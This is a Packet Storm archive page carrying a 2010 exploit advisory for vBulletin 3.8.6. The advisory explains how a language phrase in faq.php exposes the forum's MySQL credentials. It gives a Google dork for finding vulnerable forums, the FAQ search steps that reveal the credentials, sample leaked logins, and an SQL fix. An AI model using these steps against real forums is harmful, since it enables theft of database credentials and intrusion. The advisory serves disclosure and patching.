what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

vBulletin 3.8.6 faq.php Information Disclosure

vBulletin 3.8.6 faq.php Information Disclosure
Posted Jul 26, 2010
Authored by H-SK33PY

vBulletin version 3.8.6 suffers from an information disclosure vulnerability in faq.php.

tags | exploit, php, info disclosure
SHA-256 | 108c236ac3fab0c324e45083ac23839cfa7fc8d0ead4c2c1bd6c28cd0e132ebb

vBulletin 3.8.6 faq.php Information Disclosure

Change Mirror Download
   010101010101010101010101010101010101010101010101010101010   
0 0
1 Iranian Datacoders Security Team 2010
0 0
010101010101010101010101010101010101010101010101010101010

# Original Advisory: http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded

# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability
# Date: 24/07/2010
# Author: H-SK33PY
# Software Link: http://www.vbulletin.com/
# Version: 3.8.6
# Google dork : powered by vBulletin 3.8.6
# Platform / Tested on: linux
# Category: webapplications
# Code : N/A

#BUG:#########################################################################

Is perhaps one or the other known, but I find that really interesting that a great and mighty forum software like vBulletin can undermine the mistake that the MySQL password for any person to be visible.

The issue has been published this afternoon and vBulletin responded with a patch on it.

The faq.php was only indirectly affected, and serves more as an "issue" because an error was partly responsible for the phrases.

Where are the gaps?

Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what we find? Ah interesting:

##################################################################################################
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
##################################################################################################

How do I use this from now?
We look for a forum, which is affected by this vulnerability, click above on "Help" / "FAQ", enter in "search terms" or "Search Word (s):" then "Database"
(or database) and a then see, aha, first hit:

##################################################################################################

Datenbank-Name: XXXXXXXXX

Datenbank-Server: localhost

Datenbank-Port: 3306

Datenbank-Benutzername: root

Datenbank-Kennwort: my4moo
##################################################################################################


Respectively English beeen at a board:

##################################################################################################
Database Name: pro_aXXXXXXXXXg_com

Database Host: localhost

Database Port: 3306

Database Username: pro_aXXXXXXXXXg

Database Password: gitl0st
##################################################################################################

On what to do with it, I think I need not dwell on it.

How do I protect myself?
As already posted a patch from the official vBulletin site, or by a MySQL query:

##################################################################################################
DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'


##################################################################################################
##################################################################################################
##################################################################################################

#############################################################################
Our Website : http://www.datacoders.ir

Special Thanks to : ccC0d3rZzz & all iranian datacoders members

#############################################################################

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close